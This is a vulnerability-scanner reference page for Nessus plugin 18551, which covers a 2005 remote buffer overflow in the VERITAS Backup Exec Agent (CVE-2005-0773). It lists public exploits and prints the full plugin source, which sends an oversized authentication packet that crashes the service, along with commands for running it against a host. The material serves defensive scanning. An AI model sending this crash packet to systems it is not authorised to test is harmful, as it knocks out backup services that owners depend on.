VERITAS Backup Exec Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow - Nessus

Critical   Plugin ID: 18551

This page contains detailed information about the VERITAS Backup Exec Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 18551
Name: VERITAS Backup Exec Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow
Filename: veritas_agent_overflow.nasl
Vulnerability Published: 2005-06-22
This Plugin Published: 2005-06-23
Last Modification Time: 2018-08-06
Plugin Version: 1.19
Plugin Type: remote
Plugin Family: Windows
Dependencies: veritas_agent_detect.nasl

Vulnerability Information


Severity: Critical
Vulnerability Published: 2005-06-22
Patch Published: 2005-06-22
CVE [?]: CVE-2005-0773
CPE [?]: cpe:/a:symantec:veritas_backup_exec

Synopsis

Arbitrary code can be executed on the remote host.

Description

The remote host is running a version of VERITAS Backup Exec Agent which is vulnerable to a remote buffer overflow. An attacker may exploit this flaw to execute arbitrary code on the remote host or to disable this service remotely.

To exploit this flaw, an attacker would need to send a specially crafted packet to the remote service.

Solution

http://seer.support.veritas.com/docs/276604.htm

Public Exploits


Target Network Port(s): N/A
Target Asset(s): Services/veritas-backup-agent
Exploit Available: True (Metasploit Framework, Exploit-DB, Core Impact)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the VERITAS Backup Exec Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow vulnerability:

  1. Metasploit: exploit/windows/backupexec/remote_agent
    [Veritas Backup Exec Windows Remote Agent Overflow]
  2. Exploit-DB: exploits/windows/remote/16332.rb
    [EDB-16332: Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score:10.0 (High)
Impact Subscore:10.0
Exploitability Subscore:10.0
CVSS Temporal Score:8.3 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:8.3 (High)

Go back to menu.

Plugin Source


This is the veritas_agent_overflow.nasl nessus plugin source code. This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(18551);
 script_version("1.19");
 script_cvs_date("Date: 2018/08/06 14:03:16");

 script_cve_id("CVE-2005-0773");
 script_bugtraq_id(14019, 14021, 14022);

 script_name(english:"VERITAS Backup Exec Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow");
 script_summary(english:"Test the VERITAS Backup Exec Agent buffer overflow");

 script_set_attribute(attribute:"synopsis", value:
"Arbitrary code can be executed on the remote host." );
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of VERITAS Backup Exec Agent
which is vulnerable to a remote buffer overflow.  An attacker may
exploit this flaw to execute arbitrary code on the remote host or to
disable this service remotely. 

To exploit this flaw, an attacker would need to send a specially
crafted packet to the remote service." );
 script_set_attribute(attribute:"solution", value:
"http://seer.support.veritas.com/docs/276604.htm" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Veritas Backup Exec Windows Remote Agent Overflow');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value: "2005/06/22");
 script_set_attribute(attribute:"patch_publication_date", value: "2005/06/22");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/06/23");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:veritas_backup_exec");
 script_end_attributes();
 
 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_require_ports("Services/veritas-backup-agent");
 script_dependencies("veritas_agent_detect.nasl");
 exit(0);
}

port = get_kb_item("Services/veritas-backup-agent");
if ( ! port ) exit(0);

connect_open_request = raw_string(
	0x80, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x01, 0x42, 0xBA, 0xF9, 0x91, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03
);


connect_client_auth_request = raw_string (
	0x80, 0x00, 0x04, 0x3E, 0x00, 0x00, 0x00, 0x02, 0x42, 0xBA, 0xF9, 0x91, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x09, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 
	0x00, 0x00, 0x00, 0x06, 0x6E, 0x65, 0x73, 0x73, 0x75, 0x73, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00) +
	crap(data:"A", length:0x400) + raw_string (0x00, 0x00, 0x00, 0x04, 0x04);

if (!get_port_state(port))
  exit (0);

soc = open_sock_tcp (port);
if (!soc) exit (0);

buf = recv (socket:soc, length:40);
send (socket:soc, data:connect_open_request);
buf = recv (socket:soc, length:32);
send (socket:soc, data:connect_client_auth_request);
close (soc);

sleep (10);

for (i = 0; i < 3; i ++)
{
 soc = open_sock_tcp (port);
 if (soc) { close(soc); exit(0); }
 sleep(1);
}

security_hole(port);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/veritas_agent_overflow.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\veritas_agent_overflow.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/veritas_agent_overflow.nasl

Go back to menu.

How to Run


Here is how to run the VERITAS Backup Exec Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select Windows plugin family.
  6. On the right side table select VERITAS Backup Exec Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow plugin ID 18551.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl veritas_agent_overflow.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a veritas_agent_overflow.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - veritas_agent_overflow.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state veritas_agent_overflow.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 16230 - Veritas Backup Exec Agent Browser 8.x < 8.60.3878 HF 68 / 9.0.x < 9.0.4454 HF 30 / 9.1.x < 9.1.4691 HF 40 RCE
  • 101294 - Veritas Backup Exec Remote Agent 14.1.x < 14.1.1786.1126 / 14.2.x < 14.2.1180.3160 / 16.0.x < 16.0.1142.1327 Use-after-free RCE (VTS17-006)
  • 16232 - VERITAS Backup Exec Agent Browser Registration Request Remote Overflow

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file veritas_agent_overflow.nasl version 1.19. For more plugins, visit the Nessus Plugin Library.

Go back to menu.